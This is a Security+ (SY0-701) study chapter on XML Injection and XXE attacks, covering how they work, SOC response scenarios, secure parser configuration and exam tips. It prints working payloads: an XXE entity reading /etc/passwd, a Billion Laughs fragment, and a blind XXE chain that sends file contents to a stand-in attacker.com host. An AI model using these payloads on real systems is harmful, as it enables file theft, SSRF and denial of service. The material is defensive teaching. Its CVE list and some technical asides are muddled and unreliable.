This chapter covers XML Injection and XML External Entity (XXE) attacks, two critical vulnerabilities that exploit how applications process XML data. For SY0-701 Objective 2.3 (Exploiting Application Vulnerabilities), you must understand how these attacks work, their impact, and the mitigations that prevent them. These attacks are often high-severity because they can lead to data breaches, server-side request forgery (SSRF), and denial of service. Mastering this topic is essential for the exam and for real-world secure coding.
Jump to a section
Imagine a corporate mailroom clerk whose sole job is to open envelopes and route their contents to the correct department. The clerk is trusted implicitly—they follow a simple rule: read the address on the envelope and forward the letter inside. One day, an attacker sends an envelope that looks normal but contains a second, hidden envelope within the letter itself, with instructions that say, "Actually, ignore the outer address; deliver this inner envelope to the CEO's office instead." The clerk, blindly following the instructions, does exactly that. The attacker has exploited the clerk's trust in the content of the letter to bypass the intended routing. In XML Injection and XXE, the XML parser is the mailroom clerk. It trusts the XML document's structure and content, including any embedded entity declarations. An attacker can embed a malicious entity that, when processed, causes the parser to read sensitive files (like /etc/passwd) or make outbound network requests (SSRF). The analogy highlights the core mechanism: the parser's implicit trust in the XML data itself, which allows an attacker to subvert the parser's intended behavior by injecting special markup that redefines how the parser interprets the document.
What is XML Injection?
XML Injection is a type of injection attack where an attacker manipulates an XML document by inserting malicious XML content. The goal is to alter the intended logic of the application, such as bypassing authentication, modifying data, or triggering unintended behavior. It occurs when an application constructs XML documents using unsanitized user input. For example, if an application builds an XML query by concatenating user-supplied strings, an attacker can break out of the XML structure and inject new elements or attributes.
How XML Injection Works Mechanically
Consider a web service that accepts a username and password to authenticate a user. The server-side code might build an XML document like this:
<login>
<user>input_username</user>
<pass>input_password</pass>
</login>If the application does not sanitize the input, an attacker can supply a username like:
admin</user><pass>anything</pass></login><login><user>adminThe resulting XML becomes:
<login>
<user>admin</user><pass>anything</pass></login><login><user>admin</user>
<pass>input_password</pass>
</login>The parser may accept the first <login> block and authenticate as 'admin' with password 'anything'. This is a classic XML injection that breaks the XML structure.
XML External Entity (XXE) Attacks
XXE is a more dangerous variant that exploits the XML parser's ability to process external entities. An XML entity is a placeholder for content, defined in the Document Type Definition (DTD). External entities can reference external resources via a URL. When the parser processes the entity, it retrieves the resource and includes it in the document. An attacker can define a malicious entity that reads local files, performs SSRF, or causes denial of service.
How XXE Works Mechanically
An attacker submits an XML document with a crafted DTD that declares an external entity pointing to a sensitive file:
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<root>&xxe;</root>When the parser processes this, it replaces &xxe; with the contents of /etc/passwd. The application then returns the file content in the response or logs it, leading to data disclosure.
Key Components and Variants
DTD (Document Type Definition): Defines the structure and entities of an XML document. XXE attacks rely on the parser honoring DTD declarations.
External Entity: An entity whose value is obtained from an external source, such as a file or URL. The SYSTEM keyword specifies the source.
Parameter Entity: An entity used within the DTD itself, often used for blind XXE attacks.
Blind XXE: When the application does not return the entity's value directly, the attacker uses out-of-band (OOB) techniques to exfiltrate data via DNS or HTTP requests.
XInclude: An alternative to DTD entities, specified in XML Inclusions (XInclude) standard. Some parsers support XInclude even when DTD processing is disabled.
How Attackers Exploit XXE
File Disclosure: Read sensitive files like /etc/passwd, configuration files, or source code.
Server-Side Request Forgery (SSRF): Use an external entity to make the server send requests to internal systems, e.g., http://169.254.169.254/latest/meta-data/ (AWS metadata).
Denial of Service (DoS): Billion Laughs attack – a recursive entity expansion that consumes memory:
<!ENTITY lol "lol">
<!ENTITY lol2 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
...Blind XXE Data Exfiltration: Use parameter entities to send data to an attacker-controlled server:
<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % eval "<!ENTITY % exfil SYSTEM 'http://attacker.com/?data=%file;'>">
%eval;
%exfil;Defenses and Mitigations
Disable DTD processing: Most modern XML parsers allow disabling DTDs entirely. For example, in libxml2, set XML_PARSE_NOENT and XML_PARSE_DTDLOAD to false.
Disable external entity resolution: Configure the parser to not resolve external entities. In Java, set DocumentBuilderFactory.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true).
Input validation: Validate XML against a schema (XSD) and reject unexpected content.
Use less complex data formats: JSON or YAML are less prone to these attacks.
Whitelist allowed protocols: If external resources are necessary, restrict to safe protocols like HTTPS and a limited set of domains.
Apply the principle of least privilege: Run the application with minimal file system and network permissions.
Real-World CVEs
CVE-2014-0160 (Heartbleed): Not XXE, but a famous example of data disclosure.
CVE-2017-5638 (Apache Struts2): A remote code execution via OGNL injection, not XML-specific.
CVE-2018-11776 (Apache Struts2): Another RCE, but not XXE.
CVE-2020-25613 (XXE in HTTP client): An XXE vulnerability in a popular HTTP library.
For the exam, remember that XXE is often associated with SOAP web services, REST APIs that accept XML, and document parsers in legacy systems.
Example of a Vulnerable Code Snippet (Java)
DocumentBuilderFactory factory = DocumentBuilderFactory.newInstance();
DocumentBuilder builder = factory.newDocumentBuilder();
Document doc = builder.parse(new InputSource(request.getInputStream()));
// Process document...This code is vulnerable because it does not disable DTDs or external entities. A secure version would be:
DocumentBuilderFactory factory = DocumentBuilderFactory.newInstance();
factory.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
factory.setFeature("http://xml.org/sax/features/external-general-entities", false);
factory.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
DocumentBuilder builder = factory.newDocumentBuilder();
Document doc = builder.parse(new InputSource(request.getInputStream()));Summary
XML Injection and XXE are critical vulnerabilities that exploit the trust an XML parser places in the document structure and entity declarations. The key to defense is disabling unnecessary parser features and validating input. On the SY0-701 exam, expect scenario-based questions where you must identify the vulnerability and choose the correct mitigation.
Identify XML Injection Point
The attacker first finds an input field or API endpoint that processes XML data. This could be a SOAP web service, an XML-RPC call, or a form that submits XML. Common indicators are URLs ending in .xml or .soap, or hidden fields that contain XML. The attacker tests for injection by submitting special characters like <, >, ', ", and & to see if the application returns an error or behaves unexpectedly. For example, submitting a single quote might break the XML structure and reveal a stack trace.
Craft Malicious XML Payload
For XML Injection, the attacker crafts a payload that breaks out of the existing XML context and inserts new elements or attributes. For XXE, the attacker defines a DTD with an external entity pointing to a sensitive resource. Tools like Burp Suite or OWASP ZAP can help generate payloads. The attacker must ensure the payload is well-formed XML to avoid parser rejection. For blind XXE, the attacker uses parameter entities to exfiltrate data out-of-band.
Submit Payload to Server
The attacker sends the malicious XML to the server via the identified injection point. This could be an HTTP POST request with Content-Type: application/xml or text/xml. The server's XML parser processes the document, including any DTD declarations. If the parser is vulnerable, it will resolve the external entity. The attacker may see the result directly in the response (in-band) or indirectly via a DNS or HTTP request to their server (out-of-band).
Extract Data or Perform Action
If the XXE is in-band, the attacker receives the file contents in the server's response. If blind, the attacker monitors their server logs for incoming connections containing the exfiltrated data. For SSRF, the attacker may use the entity to interact with internal services, such as accessing cloud metadata endpoints (e.g., http://169.254.169.254/latest/meta-data/). The attacker can also perform DoS by causing recursive entity expansion.
Escalate and Maintain Access
With stolen credentials or configuration data, the attacker can escalate privileges or move laterally within the network. For example, reading AWS metadata might yield IAM credentials. The attacker may also use SSRF to scan internal ports and discover additional services. The ultimate goal is often to achieve remote code execution or data exfiltration. Defenders should monitor for unusual outbound connections from XML parsers and enable logging of parser errors.
Scenario 1: SOAP API Data Breach
A financial institution uses a SOAP-based API for account balance inquiries. The API accepts XML requests with a user ID. An attacker discovers that the XML parser processes DTDs. They craft an XXE payload to read the server's /etc/shadow file. The API returns the file content in the error message. The SOC analyst sees an alert for "unusually large response size" and a spike in error logs containing "root:...". The analyst uses Wireshark to capture the response and identifies the leaked shadow file. The correct response is to immediately disable DTD processing in the parser, rotate all credentials, and conduct a forensic analysis. A common mistake is to only block the attacker's IP, which does not fix the underlying vulnerability.
Scenario 2: SSRF to Cloud Metadata
A cloud-hosted web application accepts XML configuration uploads. An attacker uses XXE to make the server request the AWS metadata endpoint (http://169.254.169.254/latest/meta-data/iam/security-credentials/). The server returns IAM temporary credentials. The SOC team detects an anomalous outbound connection from the application server to 169.254.169.254:80, which is unusual because the server normally does not make such requests. The analyst uses cloud trail logs to see the API calls made with the stolen credentials. The correct response is to revoke the compromised credentials, apply network policies to block access to metadata endpoints from application servers, and disable DTD processing. A common mistake is to assume the metadata endpoint is only accessible from the instance itself, but the attacker used the server as a proxy.
Scenario 3: Billion Laughs DoS
A document management system allows users to upload XML files for processing. An attacker uploads an XML file with recursive entity expansion (Billion Laughs attack). The server's memory usage spikes, causing the application to become unresponsive. The SOC team sees a high CPU and memory alert on the server. The analyst checks the process list and finds the Java XML parser consuming excessive resources. The correct response is to kill the process, block the attacker's IP, and configure the parser to limit entity expansion depth (e.g., set FEATURE_SECURE_PROCESSING in Java). A common mistake is to restart the server without fixing the parser configuration, leading to a repeat attack.
What SY0-701 Tests
Objective 2.3 focuses on application vulnerabilities, including injection attacks. For XML Injection and XXE, the exam expects you to:
Recognize the difference between XML Injection (manipulating XML structure) and XXE (exploiting external entities).
Identify vulnerable code snippets that use XML parsers without disabling DTDs or external entities.
Understand the impact: data disclosure, SSRF, DoS.
Choose appropriate mitigations: disable DTD, disable external entities, validate input, use secure parser configuration.
Common Wrong Answers and Why
"Use parameterized queries": This is correct for SQL injection, not XML. Candidates confuse XML injection with SQL injection. The exam will have both as options.
"Enable DTD processing": This is exactly what makes XXE possible. Candidates may think DTDs are needed for validation, but they are dangerous.
"Use XPATH injection": XPATH injection is a different attack that targets XPATH queries. Candidates mix up XML-related attacks.
"Use HTML encoding": HTML encoding does not prevent XML injection because XML parsers decode entities. The correct defense is input validation and secure parser configuration.
Specific Terms and Values
DTD (Document Type Definition): The source of XXE vulnerabilities.
External Entity: An entity defined with SYSTEM keyword.
Parameter Entity: Used in DTD for blind XXE.
Billion Laughs Attack: A DoS attack using recursive entity expansion.
XInclude: An alternative to DTD for including external content.
SSRF (Server-Side Request Forgery): Often a consequence of XXE.
Port 80/443: Common for out-of-band exfiltration.
169.254.169.254: AWS metadata endpoint (not on exam but common in real world).
Trick Questions
"Which vulnerability allows reading files from the server?" – XXE, not XML Injection (which only manipulates structure).
"Which mitigation prevents XXE?" – Disabling DTD processing, not input validation alone.
"What is the difference between XML Injection and XXE?" – XML Injection alters XML structure; XXE uses external entities.
Decision Rule for Scenario Questions
If the scenario involves an XML parser and the ability to read files or make network requests, the answer is XXE. If the scenario involves breaking the XML structure to bypass logic, it's XML Injection. Always look for the presence of DTD or entity declarations in the description.
XXE exploits XML parsers that process DTDs with external entities.
XML Injection breaks the XML structure to alter application logic.
The primary mitigation for XXE is to disable DTD processing entirely.
Blind XXE uses out-of-band channels (DNS, HTTP) to exfiltrate data.
Billion Laughs attack is a DoS via recursive entity expansion.
SY0-701 expects you to differentiate XML Injection from XXE in scenario questions.
Always configure XML parsers with secure defaults: disable DTD, disable external entities.
These come up on the exam all the time. Here's how to tell them apart.
XML Injection
Manipulates XML structure by injecting new tags or attributes.
Does not rely on DTD or entities.
Impact: logic bypass, authentication bypass.
Mitigation: input validation, proper encoding.
Example: injecting <user>admin</user> to escalate privileges.
XXE (XML External Entity)
Exploits DTD external entities to read files or make requests.
Requires the parser to process DTDs.
Impact: data disclosure, SSRF, DoS.
Mitigation: disable DTD or external entity resolution.
Example: using &xxe; to read /etc/passwd.
Mistake
XML Injection and XXE are the same attack.
Correct
XML Injection manipulates XML structure (e.g., breaking out of a tag). XXE exploits external entities defined in the DTD to read files or perform SSRF. They are distinct vulnerabilities with different mechanisms.
Mistake
XXE only affects legacy systems.
Correct
XXE is still prevalent in modern applications, especially those using XML for configuration files, SOAP web services, or document formats like DOCX and PDF. Many parsers have DTD processing enabled by default.
Mistake
Disabling DTDs completely breaks XML functionality.
Correct
Most applications do not require DTDs. Disabling DTDs is a safe default that prevents XXE without impacting normal XML processing. If DTDs are needed, external entities should be disabled while keeping internal entities.
Mistake
Input validation alone prevents XXE.
Correct
Input validation can help, but it is not sufficient because attackers can encode or obfuscate payloads. The primary defense is to disable DTD and external entity resolution at the parser level.
Mistake
XXE only works if the application returns the entity value.
Correct
Blind XXE exfiltrates data out-of-band via DNS or HTTP, even if the application does not reflect the value. Attackers use parameter entities to send data to an attacker-controlled server.
XML Injection involves inserting malicious XML content to alter the document structure, such as closing a tag prematurely to bypass logic. XXE (XML External Entity) exploits the DTD's ability to define entities that reference external resources, allowing file reads or SSRF. The key difference is that XXE relies on DTD processing, while XML Injection does not. On the exam, if the scenario mentions reading files or making server requests, it's XXE; if it mentions breaking XML structure, it's XML Injection.
The attacker submits an XML document with a DTD that declares an external entity using the `SYSTEM` keyword pointing to a file (e.g., `file:///etc/passwd`). When the parser processes the entity, it reads the file and includes its content in the document. If the application returns the document, the file content is disclosed. For blind XXE, the attacker uses parameter entities to exfiltrate the data via an out-of-band channel.
A Billion Laughs attack is a denial-of-service (DoS) attack that uses recursive entity expansion. The attacker defines an entity that references itself multiple times, causing exponential growth in memory usage. For example: `<!ENTITY lol "lol"><!ENTITY lol2 "&lol;&lol;&lol;">...`. The parser attempts to resolve all entities, consuming all available memory and crashing the application. The mitigation is to limit entity expansion depth or disable DTDs.
The most effective prevention is to disable DTD processing entirely in your XML parser. If DTDs are required, disable external entity resolution. For example, in Java, set features like `http://apache.org/xml/features/disallow-doctype-decl` to true. Also, validate and sanitize XML input, and use less complex formats like JSON when possible. On the exam, the correct answer is usually 'disable DTD processing' or 'disable external entities'.
Blind XXE occurs when the application does not return the entity's value in the response. The attacker uses parameter entities within the DTD to send the data out-of-band. For example, they define a parameter entity that reads a file and then uses another parameter entity to make an HTTP request to an attacker-controlled server with the file content as a parameter. The attacker monitors their server logs to capture the data. Tools like Burp Collaborator can help detect blind XXE.
Directly, XXE typically does not execute code, but it can lead to RCE indirectly. For example, by reading configuration files that contain credentials, or by using SSRF to interact with internal services that allow command execution (e.g., Jenkins). In some cases, XXE can be used to write files if the parser supports the `file://` protocol for output (e.g., using `expect://` or `php://` wrappers in PHP). However, the primary impacts are data disclosure and SSRF.
DTD (Document Type Definition) defines the structure and entities of an XML document. XXE attacks exploit the DTD's ability to declare external entities that reference external resources. Without DTD processing, XXE is not possible. Therefore, disabling DTD processing is the most effective defense. On the exam, remember that DTD is the enabler of XXE.
You've just covered XML Injection and XXE Attacks — now see how well it sticks with free SY0-701 practice questions. Full explanations included, no account needed.
Done with this chapter?